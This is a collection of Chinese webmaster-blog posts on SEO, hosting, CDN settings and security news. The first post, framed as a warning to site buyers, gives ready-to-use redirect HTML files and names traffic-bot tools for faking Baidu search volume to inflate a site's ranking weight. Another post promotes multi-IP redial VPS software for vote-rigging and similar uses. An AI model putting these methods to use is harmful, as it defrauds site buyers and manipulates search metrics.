为了防止新手站长上当受骗,现在我为大家揭秘那些刷百度权重不为人知的故事。 首先,分析一个网站案例。 在爱站网查询这个网站的信息,从建站时间、百度权重值、收录看都比较正常,但是我们继续往下看,看着网站的历史信息。 我们从历史信息可以发现,最近几天这个网站的权重从4掉到了2,但是最令人惊奇的是这个网站的收录词数只有1个。只有1个收录词数的权重4网站是很少见,除非是偶然出现的热门词,我带着这种疑惑看了一下到底是收录的什么词。 同时,我用百度指数查询了一下这个词。 从收录值和百度指数,可以明确判断出这个网站的权重是刷上去的。 接下来,我们揭秘一下如何刷网站权重。 第一,需要明白影响百度权重的因素 假设你的网站有一个关键词在百度有排名,如果这个关键词的百度指数很高的话,那这个网站的百度权重一定会很高。所以从上图可以看出,那个网站的域名关键词指数很高,所以这个网站的权重就很高。 那么,我们可以思考到,假设我们能够把网站的独有一个关键词的百度指数刷上去,那么这个网站的百度权重一定很高。是什么影响关键词的百度指数呢?就是网民用百度搜索这个关键词的次数,所以只需要把网站独有的关键词的搜索次数刷上去就可以快速提升百度权重了。 第二,如何进行刷关键词的搜索次数呢? 这里我们需要3段代码和一个工具。 把三段代码分别复制到记事本中,并把记事本的名称分别改为s1.html,s2.html,shuaquanzhong.html,如图所示 其中,文件s1.html为:<script>function aa(){  window.location.href='http://www.baidu.com/s?wd=紫菜头博客'; }setTimeout(aa,1500);</script> 文件s2.html的代码为:<script>window.location.href='http://www.baidu.com/s?wd=紫菜头博客';</script> 其中,文件shuaquanzhong.html的代码为:FRAMESET border=0 frameSpacing=0 rows=500,* frameBorder=1><FRAME name=primaryFrame src="s2.html" frameBorder=0 noResize scrolling=no><frame src="s1.html"></FRAMESET><noframes></noframes> 注意:三个文件中涉及到“紫菜头博客”为你所要刷的关键字。 接下来,我们把这三个文件上传到你的网站空间的根目录,测试一下“http://www.zicaitou.com/shuaquanzhong.html” 可以发现,点开这个链接就是模拟的百度搜索“紫菜头博客”这个关键词。达到了我们模拟百度搜索关键词的目的。 最后,我们要用到的一款工具就是流量宝或者流量精灵这种刷网站流量的工具,在软件中添加了上面的链接,然后进行疯狂的刷流量就可以了。 我们剩下要做的就是每天打开软件刷流量,坚持大概一个月的时间,你所刷的那个关键词的百度指数就会大幅度增加,这时你的网站权重也会暴增的。 结束语: 揭秘整个方法,不是为了让大家去刷百度权重骗取新人的钱,而是为了让更多的新人明白有些网站权重是不真实的,买站的时候仔细利用站长工具进行查看,不要只知其一不知其二,最后吃了大亏。 作者:【紫菜头博客】精彩分享,QQ:779178376 #### 动态拨号VPS如何自动拨号更换IP ADSLYYJ自动拨号使用说明 大家都知道,动态拨号VPS的使用范围很广泛,比如在线挂机,挂QQ,挂YY,挂各种账号等级,挂在线时长,流量转换,网络刷票等,对于需要大量不同IP的客户都是非常有用的。 购买动态拨号VPS后,很多小伙伴使用手动去拨号的,这样操作起来速度显然是非常慢的,下面我就为大家介绍一款可以自动拨号的软件---ADSLYYJ(相关软件自己可以百度搜下,这里主机吧就不提供下载了) YYJ自动拨号软件设置如下图所示:   基本设置和网络设置按照上图这样设置基本上就可以了 当然具体时间可以根据自己的实际需求进行调整 #### 动态网站使用百度云加速CDN设置方法 百度云加速是百度为数不多的良心产品之一,不仅可以对网站进行安全防护也可以当普通CDN加速使用,而且效果还非常好,还价格老便宜。不过问题也不少,比如一些动态网站客户反馈使用云加速的时候访问顿卡,打开时快时慢,网站响应慢的问题的,出现这类问题大多是因为设置不对导致的,今天主机吧来教大家动态网站使用百度云加速如何设置。首先我们进入域名管理-加速功能-CDN 缓存粒度设置:选择简单模式注意:动态网站一定不要选择细致,细致可能会导致网站一些资源命中率不高。设置智能压缩,勾选JS、CSS注意:一定不要选HTML,特别是对于一些伪静态的网站,比如Discuz!论坛,选HTML压缩会导致登陆功能异常。 开启图片自动压缩:无损压缩,如果狠点的可以选有损压缩 最后一步也是最重要的一步:全部缓存刷新 然后我们只要等待半小时左右就可以看到效果了,主机吧有一使用Discuz!的客户也是因为使用云加速后出现顿卡现象,通过以上设置方法完全解决了问题,主机吧新测非常有效,希望可以帮助大家,如果你没有解决问题的可以留言主机吧,主机吧为大家解决。 #### 动态网站使用百度云加速如何设置 动态网站是指一些拥有会员登陆、发贴、支付等需要实时显示的功能。这些功能一般不适合使用CDN缓存功能,所以不能接入CDN的时候需要特别小心,以免设置错了,影响网站重要功能的正常使用。 今天主机吧就来教大家动态网站如何设置百度云加速: 首先确认网站已经接入百度云加速,并且已经生效,如果不知道生不生效,请自行本地电脑ping域名,查看是否百度云加速的IP。教程传送门 然后进入百度云加速域名管理,CDN加速 设置 缓存粒度设置 :简单(简单模式下可以最大限制缓存一些常用的静态文件,比如一些CSS带参数的都是可以缓存的) 智能压缩:勾选全部 最大上传文件大小:选最大 图片自动压缩:有损压缩(如果是高清图片站的用无损) 做完以上配置,等30分钟即可完成,如果网站比较大的,需要等久些。 百度云加速默认只缓存一些静态格式的文件:css/js/jpg/jpeg/gif/ico/png/bmp/pict/csv/doc/pdf/pls/ppt/tif/tiff/eps/ejs/swf/ midi/mid/ttf/eot/woff/otf/svg/svgz/webp/docx/xlsx/xls/pptx/ps/class/jar 如果你有需要做缓存的内容,如MP4等视频内容,可直接通过特定页面规则功能进行缓存。参考文章《百度云加速如何缓存加速视频文件》 #### 勒索软件 Strela Stealer 利用 WebDAV 服务器传送恶意木马避免留痕 11 月 8 日消息,安全公司 Cyble 发布报告公布了勒索木马 Strela Stealer 的最新行踪,近期相关黑客主要利用该木马面向欧洲中部及西南地区的用户发动攻击。 据悉,黑客主要群发带有木马 ZIP 压缩文档的虚假发票钓鱼邮件,只要不知情的用户下载打开相关 ZIP 文档,系统便会通过系统内置的 wscript 在后台自动运行 PowerShell 命令,继而从黑客架设的 WebDAV 服务器中下载 Strela Stealer 木马。 黑客之所以选择让受害者设备直接通过 WebDAV 服务器下载恶意软件的原因是避免留下痕迹,从而降低被安全公司检测到的概率。 安全公司同时表示,黑客升级了 Strela Stealer 勒索木马的信息窃取能力,现在该木马不仅会窃取用户在 Outlook 等邮件客户端中的信息,还会寻找用户的各种配置文件以获取用户可能的各平台账号名称、密码等信息。 事实上,今年以来恶意木马滥用 WebDAV 服务器来隐藏痕迹的手法屡见不鲜,除了 Strela Stealer 外,今年 4 月一款名为 Latrodectus 的木马也是利用了相关原理,受害者的电脑在中招后便会通过黑客架设的 WebDAV 服务器下载 MSI 可执行文件,便于黑客进一步控制受害者设备。 #### 北京2022 年冬奥会官网也启用国家顶级域名“.CN”“.中国”了 4 月 28 日消息,今日,中国互联网络信息中心 CNNIC 官微表示,北京 2022 年冬奥会官网启用国家顶级域名。 IT之家了解到,中国互联网络信息中心表示,为彰显“中国举办”的国别特点,2008 年北京奥运会首次使用以国家顶级域名为后缀的官方网站域名 ——beijing2008.cn,而本次北京冬奥会,更是使用了“beijing2022.cn”和“beijing2022.中国”双域名,实现了冬奥官网中英文双语域名的同时访问。 据了解,冬奥会官网及中国奥委会官网(olympic.cn)、国家体育总局官网(sport.gov.cn)、中华全国体育总会官网(sport.org.cn)等奥运相关网站均使用“.CN”域名。此外,包括杭州 2022 第 19 届亚运会、数博会、世界互联网大会等大型体育赛事、博览会活动也纷纷启用中国国家顶级域名。 #### 北京一公司为虚拟货币交易提供软件服务被注销 网站关停 最近几个月来,相关部门出台了多种政策严管比特币等虚拟货币的挖矿及交易,现在更严厉的处罚来了——北京一公司为虚拟货币交易提供软件服务,被罚注销公司,网站也关停了。 7月6日,人民银行营业管理部(北京)、北京市地方金融监督管理局联合发布《关于防范虚拟货币交易活动的风险提示》,对涉嫌为虚拟货币交易提供软件服务的北京取道文化发展有限公司予以清理整顿,责令该公司注销,官方网站已停用。 企查查信息显示,北京取道文化发展有限公司成立于2016年4月13日,注册资金300万元,经营范围包括:组织文化艺术交流活动(不含演出);影视策划;文艺创作;承办展览展示;会议服务;公共关系服务;设计、制作、代理、发布广告;市场调查;产品设计;工艺美术设计;电脑动画设计;软件设计;软件开发;计算机技术开发、咨询、服务、转让、推广等。 据报道,该公司被注销是因为涉及为虚拟货币交易所提供软件服务。这也是此前被监管所明令禁止的:有关机构不得开展与虚拟货币相关的业务。 5月18日,互联网金融协会、银行业协会、支付清算协会联合发布《关于防范虚拟货币交易炒作风险的公告》,要求有关机构不得开展与虚拟货币相关的业务。 此后,人民银行有关部门就银行和支付机构为虚拟货币交易炒作提供相关服务问题,约谈了工商银行、农业银行、建设银行、邮储银行、兴业银行和支付宝(中国)网络技术有限公司等部分银行和支付机构,以打击比特币等虚拟货币交易炒作行为,保护人民群众财产安全,维护金融安全和稳定。 #### 北京健康宝被谁DDOS攻击了?黑客团伙曝光 5月9日 消息:360网络安全研究院今日披露了4月28日北京健康宝遭遇网络攻击的相关细节。该研究院披露的这份网络攻击报告指出,这是一起典型的网络拒绝服务攻击(DDoS攻击)事件,发起方是其内部命名为Rippr的团伙,它使用了已经披露过的恶意代码家族Fbot的作为攻击武器。 此次事件的Fbot变种,最早发现于2月10日,自被发现以来就异常活跃地参与到DDoS攻击中。截至今日,短短三个月,被跟踪到的攻击事件就超过15万次。 360安全研究院在报告中指出,当我们把该团伙攻击目标对应的国家按照时间轴来统计,可以清楚的看到该家族累计攻击的目标地理分布遍布全球,包括美国、中国、俄罗斯、英国、法国以及欧洲若干国家,这可以表明攻击者的目的选择上与地缘政治没有明确的关联关系。从时间轴上来看,攻击目标到国别的走势一直是比较随机的状态,不存在持续针对特定国家的攻击,也不存在特定时间点突然针对特定国家的攻击。 360 安全研究院认为,以他们对该家族运营团伙Rippr历史认识,认为它的主要目的是通过对外提供DDoS服务,以及挖矿来盈利,不涉及政治诉求。 #### 北京发自动驾驶路测报告 百度等8家企业获牌照 4月3日 消息:据北京日报消息,近日,北京市发布首份自动驾驶报告《北京市自动驾驶车辆道路测试报告( 2018 年)》,报告统计了每家企业的路测车队规模和路测里程。 数据显示, 2018 年,北京市已为百度、蔚来等 8 家企业的 56 辆自动驾驶车辆发放了道路临时测试牌照,自动驾驶车辆占全国一半以上,安全路测里程已超过15. 36 万公里。其中,百度跑的最多,安全路测里程达 14 万公里。预计到 2022 年,北京智能网联车辆测试开放道路里程达到 2000 公里。 3 月中旬,百度董事长李彦宏在接受媒体采访时表示,自动驾驶最后一公里会提前实现。近年来,百度已经将其重心主要放在人工智能、自动驾驶等技术的研究上。不久前,百度重磅发布了Apollo Enterprise(Apollo企业版),是全球首个最全面的自动驾驶和车联网领域的商业解决方案,开启了自动驾驶商业量产时代新征程。 #### 北京市打击DDoS攻击类违法犯罪:清理在京肉鸡7268台 来源:北京日报客户端,记者:孙莹,监制:王宁江、陈岩,编辑:蔡文清,流程编辑:王宏伟在网上付费下个单,像网购商品一样就可以对某个网站进行恶意攻击致其瘫痪无法使用。一些犯罪嫌疑人专门建立DDos攻击网站,提供攻击服务牟利,为恶性竞争和敲诈勒索当“枪”。北京市公安局网络安全保卫总队今天下午通报,北京“净网2019”专项行动中共破获各类涉网案件7800余起,抓获涉案嫌疑人8600余名。其中10个DDos攻击网站被捣毁,全国DDoS攻击犯罪态势得到明显遏制。不法网站提供DDos攻击服务牟利 所谓DDoS攻击,是指攻击者控制并利用位于不同地域的多台设备发起网络攻击,造成目标网站节点阻塞无法访问。此类攻击时间长、成本低、对各类网站和信息系统危害巨大。网安总队六支队民警王晓君告诉记者,利用DDos攻击的目的主要在于恶性竞争和敲诈勒索。“比如有的人通过DDos攻击让某个网站瘫痪后,以不给钱就继续让网站瘫痪进行威胁,勒索钱财。再比如某个游戏网站向竞争对手发起攻击,让对方的网游客户能流向自己。”今年9月,北京市公安局网安总队发起了针对“分布式拒绝服务攻击”(简称“DDoS攻击”)类违法犯罪的专项打击,并先后发现10个专门为他人提供DDoS攻击服务非法牟利的网站。犯罪嫌疑人在网站发布各种DDos攻击套餐,用户选择相应套餐,输入要攻击的网站域名并付费后,犯罪嫌疑人就发起对目标网站的攻击,该网站就瘫痪无法正常使用了。这些网站会员总数约1万人,攻击峰值流量高达400G,总攻击次数达30余万次。10个网站全捣毁,全国犯罪态势得到遏制 9月10日至18日,网安总队会同海淀公安分局奔赴广东、贵州、吉林、江西、四川、云南等6省将朱某某(男、28岁)等7名开设DDoS攻击网站的违法犯罪嫌疑人抓获归案,现场起获作案电脑10台,手机13部,捣毁全部10个DDoS攻击网站。此外,警方通过这些攻击网站的会员信息,也对购买攻击服务用于不法勾当的人员进行追查。目前,朱某某等人因涉嫌非法利用信息网络罪被海淀人民检察院批准逮捕。在侦破此案的基础上,网安总队又联合国家互联网应急中心以及相关企业团队,共同开展对DDoS攻击类违法犯罪的研究。针对涉及全国25个省的220条DDoS攻击类线索,由公安部统一指挥、全国相关地区公安机关协配合共同开展集中打击。截至目前,在全国范围内共抓获违法犯罪嫌疑人379名,清理在京被控主机7268台。据统计,专项打击期间国内DDoS攻击控制端环比下降30%,参与攻击信息系统环比下降41%,全国DDoS攻击犯罪态势得到明显遏制。北京“净网“ 破获涉网案件7800余起 网安总队在通报中还透露,今年以来,北京警方在“净网2019”专项行动中,严打侵犯公民个人信息、黑客攻击破坏、网络诈骗、网络“黄赌毒”等突出涉网违法犯罪,以及为其提供推广、支付结算、技术支持等黑灰产业链,共破获各类涉网案件7800余起,抓获涉案嫌疑人8600余名。期间,先后破获某科技公司非法获取、买卖简历数据案等侵犯公民个人信息类案件258起,抓获涉案嫌疑人1065名;破获利用非法抢号软件破坏“京医通”挂号平台信息系统案等黑客攻击类案件41起,抓获涉案嫌疑人346名。此外,按照公安部统一部署,开展“网约犯罪”预警处置工作,共预警处置“网约犯罪”案件38起,抓获涉案嫌疑人68名,有力保障了人民群众生命财产安全和社会稳定。今年以来,网安系统共执法检查全市联网单位2万余家次,挂牌整治违法违规互联网数据中心企业37家次、网站177家次;行政处罚安全制度、措施不落实,存在严重隐患、漏洞的违法违规联网单位1900余家次,封堵违法域名3671个;清理违法有害信息1300余万条,关停违法违规账号390余万个。 #### 北京市网站ICP用户注销(删除)备案申请表.doc 填表须知 (本页是填表须知,不必打印,请只打印申请表,另附上相关证件一并提交)   本表适用范围:备案号为“京ICP备”开头的所有备案信息。若备案号(主体)为北京市以外的,请找相关省通信管理局处理。 备案号分为主体备案号和网站备案号两种; 主体备案号格式为“京ICP备X号”(X为8位数字) 网站备案号格式为“京ICP备X号-1” (X为8位数字) 申请类别以实际情况进行选择,注销本单位(个人)备案信息的请勾选“注销本单位备案”;注销其他单位(个人)备案信息的请勾选“注销他单位备案”。 按申请依据可分主体依据与域名依据两种; 主体依据即主办单位有效证件(证件类型+证件号码); 域名依据即域名证书;填写注销申请时请对应具体情况说明原因。 注销申请只适用于备案号的注销,不包含对备案信息中的域名列表进行添加和删除修改。 若注销全部备案信息,请填写主体备案号以及所有域名。 若注销个别网站信息,请填写网站备案号以及对应的所有域名。 注销备案信息部分所填写的内容应与备案管理系统beian.miit.gov.cn的“公共查询”显示的内容一致。 请根据以上情况使用A4打印纸打印《注销(删除)备案申请表》,纸张不符、证件不全、未准确清晰完整填写者,视为无效申请。 申请者必须提供以下材料: 若申请者为单位,申请表须盖公章;若申请者为个人,须手写签名; 单位有效证件(如企业提供企业营业执照复印件加盖公章,个人提供身份证复印件等); 选填域名依据时还需提供域名注册证书(域名注册单位必须与申请单位一致)。 注意:若单位名称发生过变更,请提供证件颁发机构出具的名称变更证明。无公章的个体工商户,请另附营业执照上“经营者”的身份证复印件。 申请材料只接收快递、邮寄形式,地址为:北京市西城区马连道路四号,北京市通信管理局8楼ICP备案室收,联系电话63310094。快递单上必须标明“北京市ICP用户注销(删除)备案申请表” 签收3个工作日内给予处理,请申请人自行在备案系统www.beian.miit.gov.cn “公共查询”核实处理结果。如有问题工作人员会致电申请表中填写的北京联系电话。(若因申请人手机关机或不接听原因致使通知无法送达超过两次者,申请做放弃处理) #### 北京智源发布悟道 3.0 大模型系列 6 月 10 日消息,在“2023 北京智源大会”上,北京智源人工智能研究院发布悟道 3.0 大模型系列,包含悟道・天鹰(Aquila)语言大模型系列、“天秤(FlagEval)”大语言评测体系及开放平台以及悟道・视界视觉大模型系列。 悟道・天鹰 Aquila 语言大模型是第一个中英文双语大模型,支持商用、符合数据合规要求,在中英高质量合规的语料数据库基础上从零开始训练。这次发布了该系列模型中的 7B、33B 和 AquilaChat 对话模型,即 70 亿参数、330 亿参数的基础模型,AquilaCode 文本代码生成模型。 7B、33B 在技术上继承了 GPT-3、LLaMA 等的架构设计优点,替换了一批更高效的底层算子实现、重新设计实现了中英双语的 tokenizer,升级了 BMTrain 并行训练方法,在 Aquila 的训练过程中实现了比 Magtron+DeepSpeed ZeRO-2 将近8倍的训练效率。 AquilaCode-7B 代码模型,是基于 Aquila-7B 基础模式的代码模型,它也是 7B(70 亿参数),用小数据集、小参数量实现了高性能,支持中英双语。 大语言模型评测体系“天秤”在能力、任务、指标三个维度上建立了全方位的评测体系,包括 30 多种能力,加上 5 种任务,再乘以 4 大类的指标,总共差不多 600 维的评测体系。目前天秤开源大模型评测体系已经面向公众开放注册申请。在硬件方面支持英伟达、华为的昇腾、寒武纪、昆仑芯等多种芯片架构,以及 PyTorch 等多种深度学习框架。 视觉大模型方面,智源大会公布了在多模态序列中补全一切的多模态大模型 Emu、最强十亿级视觉基础模型 EVA、性能最强开源 CLIP 模型 EVA-CLIP、首创了上下文图像学习技术路径的通用视觉模型 Painter、分割一切的视界通用分割模型、以及首个零样本视频编辑方法 vid2vid-zero 等成果。 #### 北京民营企业科技创新榜发布!百度第一、小米第四 9月26日消息,今天,北京市工商联举办2024北京民营企业百强”发布会,正式发布了北京民营企业科技创新百强榜单。 据了解,民营企业科技创新百强榜单以企业2023年度营业收入、研发费用、研发强度、研发人员为核心指标,综合考量企业依法合规经营、诚实守信等方面情况,根据核心指标和辅助指标的量化赋值确定入围榜单企业。 榜单显示,百度公司在榜单上位居第一,显示出其对于科技创新投入的力度,在3月份接受央视采访时,李彦宏表示,百度对技术很重视,这么多年研发费用占到收入的比重一直是20%多。 北京奇虎科技有限公司和北京三快在线(美团),分别位居二三位。 紧随其后的是小米通讯技术有限公司,位居第四位,此前小米在2023年宣布,未来五年研发投入将超过1000亿元。 此外排名前十的企业还有广联达、北京神州细胞、北京四维图、新紫光、用友网络、第四范式,具体榜单如下图: #### 北京知道创宇被美国国防部拉黑了 2022年10月5日,美国国防部将 13 家中国企业列入“黑名单”。 新增 13 家企业如下: 1、北京知道创宇信息技术股份有限公司2、深圳华大基因股份有限公司 3、中国国际工程有限咨询公司 4、中国化工集团有限公司 5、中国化学工程集团有限公司 6、中国建筑集团有限公司 7、云从科技集团股份有限公司 8、中国中车股份有限公司 9、曙光信息产业股份有限公司 10、中译语通科技股份有限公司 11、深圳市大疆创新科技有限公司 12、浙江大华技术股份有限公司 13、三六零安全科技股份有限公司 其它公司主机吧不是很了解,不过知道创宇主机吧就有些熟悉,因为知道创宇是一家做网络安全的公司,国内很多单位网站都是用他们家防御的,比如我们站长常去的ICP备案查询网站。 还有QQ网址绿标的创宇信用,也是出自这家公司。还有我们以前用的加速乐也是来自知道创宇,总知道创宇多少跟网站建设这块有些渊源。 这次被美国拉黑,估计是知道创宇一直做政府机构的安全业务所致,老美实在太坏了。 #### 北京网信办约谈处罚新浪微博 新浪微博热搜榜停更一周 6月10日 消息:据网信中国公众号消息, 6 月 10 日,国家互联网信息办公室指导北京市互联网信息办公室,约谈新浪微博负责人,针对微博在蒋某舆论事件中干扰网上传播秩序,以及传播违法违规信息等问题,责令其立即整改,暂停更新微博热搜榜一周,时间自 6 月 10 日 15 时至 6 月 17 日 15 时,暂停更新热门话题榜一周,时间自 6 月 10 日 15 时至 6 月 17 日 15 时,严肃处理相关责任人,同时,要求北京市互联网信息办公室对新浪微博依法从严予以罚款的行政处罚。 国家互联网信息办公室有关业务局负责人强调,网站平台应当切实履行主体责任,健全管理制度,明确内部审核处置流程,既不得为违法违规信息提供传播平台,又不得随意干预信息正常呈现、干扰网上传播秩序。国家互联网信息办公室将进一步强化日常监管,督促相关网站平台加强内部管理和自律,依法依规开展服务。 #### 北京网站被CC攻击如何防御 北京网站CC攻击防护 有客户问网站主要服务于北京用户,而服务器也部署在了北京,因经常遭到CC攻击,所以想咨询主机帮,使用什么产品好防御CC攻击,要求节点是在北京的,因为这样北京客户访问快。 主机邦推荐使用百度云防护 Web应用防火墙 WAF 来防御CC攻击。 因为百度云防护使用的就是北京节点,而且是BPG多线节点,全国各地访问速度都不差,特别是北京线路访问非快。 百度云防护拥有完善的CC攻击功能。 支持被动防御和主动防御,可自动识别高频CC攻击,同时针对一些特别需求可自定义访问策略。 可限制频率URI访问频率 地区黑名单 404响应拦截 企业版还支持BOT防护,可有效拦截恶意爬虫 而且套餐流量非常高,性价比非常高,非常值得推荐。 有需要的同学可以了解下:https://www.zhujib.com/shop/26864.html #### 北斗系统定位已超GPS?百度地图优先使用北斗 9月30日 消息:近日,百度地图宣布正式切换为北斗优先定位,百度地图智能定位开放服务升级为百度地图北斗定位开放平台。 同时,百度地图还全面升级了车道级导航、车位级导航等多项功能。 百度称,针对高、快速路场景,百度地图车道级导航全国首发上线“车道级事故预警”功能,当在车辆临近事故位置时,可为用户实时更新前方事故车道信息,并动态引导用户提前避开危险车道,打造更加安全、舒适的驾车体验。 针对停车场景中“停车难、找车烦”问题,百度地图行业首创车位级导航再度拓展落地场景,助力云南普洱成为首个停车自由旅游城市,并成功落地“亚洲最大停车场”吉尼斯纪录的北京荟聚购物中心和“亚洲最大综合铁路客运枢纽”北京丰台站。 此次百度地图优先使用北斗,是否意味着北斗商业定位上比GPS更精准呢?毕竟导航是以精准度优先的。 #### 区块链是骗局?上线不久就被封 TFBOYS.one网站无法访问 继数字交易平台OKEX公众号被封,火币网公众号被删名事件后,又一家区块链相关网站出现异常。 有网友发现,才上线不久的“TFBOYS.one区块链粉丝团”网站现在已经无法访问。使用微信进入“TFBOYS.one”网站,页面提示:“网页 包含诱导分享、关注等诱导行为内容,被多人投诉,为维护绿色上网环境,已经停止访问”。 据官方资料显示,TFBOYS饭票(TFBC)是由区块链粉丝后援团体自发创立的全球首个基于区块链技术的偶像饭圈数字通证(Token),同时未来在此基础上打造全球首个粉丝区块链文化圈。 值得一提的是,TFBOYS经纪公司曾发声明表示,TFBOYS饭票并不是官方发行的区块链概念“饭票”,并申明从未授权任何组织及个人发行相关饭票,并怀疑是有人搞事,借组合名义进行非法牟利。 #### 医疗网站注意啦!百度搜索治理医疗内容 百度搜索一直致力于提供安全、健康、优质的内容生态,帮助用户更便捷的获取高质量信息。但近期平台在日常监控和用户举报中发现,有部分医疗站点出现低质及违规内容。此类行为会严重影响用户体验、侵犯用户权益。 因此我们将于2023年8月3日启动专项治理行动,针对相关低质站点,将限制其在搜索结果中的展现。请各医疗站点尽快自查自纠,并于7个工作日内完成整改工作。对于未及时整改的内容及相关站点,平台将视恶劣程度进行相应的处理;针对积极经营优质内容的合作方,我们也将基于体验进行更大力度的扶持。 如果广大用户发现有影响体验和用户权益的违规问题,非常欢迎通过站内举报入口或邮箱:healthfeedback@baidu.com进行举报,我们将及时跟进处理,并对违规行为从严惩处和曝光。 我们希望与内容合作方携手,建设风清气正的内容生态氛围,感谢理解和支持。如您有任何疑问或建议,请随时与我们联系。 #### 十多天了,阿里云新加坡机房ECS还有完全恢复! 还记得9月10号因为机房火灾原因出现故障的阿里云新加坡云服务器吗? 从阿里云官网的健康板查阅到,新加坡可用区仍然没有完全恢复,截至今天已经11天了,现在的阿里新加坡云服务器ECS产品的健康状态仍为异常,事件日志也在16日更新后就没有继续更新了,也就是说还有很多机器在等待干燥修复,看来是大事故,也许数据丢失也是难免的。 如果你重要业务放在那个机房,而且没有备份,那这会黄花菜都凉了。 想要阿里云赔偿你的损失,概率也不大,因为机房着火属于不可抗拒因素,免责的,顶多是赔偿一些时间给你。 所以无论是大厂小厂,自己都要做好数据备份工作,尤其是重要的数据,没有哪个厂商敢承诺不丢失数据、不故障,越大的厂商在这方面越是不会给你承诺,如果你的是一个小站,每隔一两个月导出备份一次,对于页面更新不频繁的,最简单的备份数据库SQL文件到本地总会把。 #### 十年老站长的赚钱经历 之前用过两年百度联盟,后来因为某些原因改用adsense,不知不觉已经十年了从dede到discuz再到wp从空间到vps再到云服务器从美国到大陆又到香港巅峰时期收录上千万,蜘蛛数十万低谷时期被百度拔毛很久曾经日入过10w,也沦落到过一个月两千(非adsense收入)我的网站,在一次次升级中带我走向成熟寄托了我乏味生活中的英雄梦想如今我已从学生变为人父大概我是一名比较没有追求的站长我不要把它最大做强为我带来万千荣耀我只想让它只属于我一个人永远存在于这个世界 来源-十年老站长的自述 #### 十年谷歌正式关闭短网址服务goo.gl 在获得 1 年的缓刑之后,谷歌短网址服务(Google URL Shortener) 于今天正式宣告停止支持。事实上近期谷歌关闭的服务有点多,Google Allo已经停止服务 18 天了,而Google+和Inbox by Gmail将会在 4 月 1 日停止支持。 根据 https://goo.gl/ 网站所显示的信息,自 2018 年 3 月 30 日开始谷歌开始逐渐关闭goo.gl URL短网址服务。在 2018 年 4 月 13 日之后只允许现有用户继续使用短链接生成服务,另外还能查看他们的分析数据以及以CSV的格式下载短链接信息。而在 2019 年 3 月 30 日,goo.gl控制台将正式关闭。 谷歌短网址服务goo.gl于 2009 年 12 月 14 日上线,距离服务关闭有 9 年时间。在该服务关闭之后将会被全新的Firebase动态链接所取代,它是一种“智能网址”,除了网页以外它还可以方便地将用户“转到 iOS 或 Android 应用中的任意位置”,显然在 Google 眼中它会比原来的 goo.gl 更加好用。 #### 千万别乱接广告:站长网站被广告劫持流量大跌 今天在4414论坛看到一位网友的贴文,主机吧认为非常值得各位站长警惕,转给大家看下。 前几天遇到一个 广告商找我 一开始说万IP 给我25    我没有同意,后来谈到 万IP30 并且只给一个星期一付款 ,在他之前有个广告商也是这样做的,没有一点问题!  所以,后来就也放了他的广告。 谁知道自从接了他的广告我的网站流量 一直在往下掉,一开始我没太在意,以为百度调整,等了几天发现还是这样,流量持续下降,我查原因以为是谷歌广告问题,就屏蔽了部分谷歌的投放商家。 谁知道还是出现,并且有广告商家告诉我,不停的弹出一个省呗的广告,我以为还是谷歌,因为我谷歌屏蔽了,不知道为什么一直还有,并且它是 直接打开网站以后跳转到省呗广告页面。   后来经过第一个广告商家的好心提醒,才发现是第二个广告商家的原因,他搞了劫持,只要打开我的网站就直接跳转到他的省呗广告页面。 仅仅半个月,我网站权重就从5掉到了 权重0      ,  真是惨不忍睹啊!  所以以后大家接广告,特别是私人广告上家,千万要看清楚。 钱没挣到,网站还搭进去了。 现在已经把广告删除,不知道还能不能恢复到原来的 权重 按照 我是小白  说的 我去看了一下 跳出率 没有明显变化   但是IP 变化非常大 我刚才看了一下统计, 上了第一个JS广告每天IP没有明显变化减少, 但是上了第二个JS, 从第3天开始就 直接减少了 2000  左右 从第7天开始就直接减少了 4000 左右 从第10天以后减少了 8000左右 这里主机吧给各位站长一个建议,千万别用那些小广告联盟的广告,99%都是有劫持的,会给网站弹窗的,而且千万给网站乱加别人的JS代码,对方可以改的,做什么你都不知道。 如果要接广告就用自己的代码,做个文字链接或者图片广告即可,千万别用JS,这些广告商给的JS代码100%有问题的。 #### 千万别用阿里云Web应用防火墙来防CC攻击 最近,给一位客户做安全防护,该客户是一个网站受到了CC攻击, 客户直接花5000多块买了阿里云Web应用防火墙,主机吧在代客户操作的时候,有幸接触了阿里云Web应用防火墙 。 这里主机吧不得不吐嘈下,阿里云的Web应用防火墙,价格实在贵,而且功能很少。 5000多一个月买的高防版WEB应用防火墙,CC攻击防御只有简单的默认官方规则,无法自义拦截规则。 如果用紧急防御模式的话,很多时候是有问题,比如微信小程序会有问题。 但是如果你想要自义规则,那么就需要购买11300元一个月的企业版套餐,简直是土豪专用。 主机吧还发现阿里云Web应用防火墙只有简单的CC防御量预览,根本无法看到CC攻击路径,IP等信息,这根本无法针对性的做防御拦截。 所以主机吧认为用阿里云WEB应用防火墙来做CC攻击防御的话,是非常没有性价比的,而且功能不齐全,Web应用防火墙根本不是为了防御流量攻击而生的,主要是为了防御网页程序漏洞,网站入侵而来的。Web应用防火墙被攻击超量后,应用防火墙会进入沙盒,会对访问进行限制,导致正常业务无法访问。 如果要防御DDOS和CC攻击等流量攻击的话,建议选择专业的高防IP、或者高防CDN,支持自义防御规则的同时,还可以有清晰的报表查看,可有效防御各类攻击。 高防IP推荐:https://zhujib.com/go/gao-fang-ip #### 千万别用!暗藏广告的BaiduXZH Submit百度熊掌号提交插件 最近文章更新频繁,总是需要到百度熊掌号官网提交有点麻烦,于是就在网上找了个自动提交百度熊掌号的插件名叫:BaiduXZH Submit的。 一开始觉得挺好的,有免费版和收费版,主机吧也没这么高要求,就一直用免费版的。 但万万没想到这插件居然暗藏广告的,很可耻!如果不是最近想要给网站加个分享代码留意了下html代码,估计都很难发现。 这插件居然自动给每个文章后面加了一条广告,如下图: 虽说用免费的有些拿来主义,但这种暗藏广告代码的行为更为可耻,建议大家千万别用。     #### 千万别租微信号给别人:女子出租微信被用于诈骗成共犯 6月20日 消息:据荔枝视频报道,近日,武汉女孩小李看到“30元一天”的租借微信兼职信息,便交出了自己的账号密码。 此后几天,小李在手机上清楚地看到对方在PC端登录,疯狂建群添加好友,并引导陌生好友刷单进行诈骗,而小李却没有举报。 三天后,小李的微信号因为违规被冻结,对方引导小李解封了微信,而小李选择继续出租账号赚钱。最终,小李的微信号导致受害人被骗6万元。 目前,小李因属于诈骗行为的共犯,已被采取刑事强制措施。 今年5月,微信官方曾表示,租借账号是不法分子账号被封想出的办法。对于在平台中租售微信帐号的行为,微信团队一直严打严防,微信用户拥有帐号的使用权,但不可以将帐号出租或转让给他人,也不可以租用或借用他人的微信帐号。 #### 升级WordPress 5.6出错了如何退回WordPress 5.5.3版本 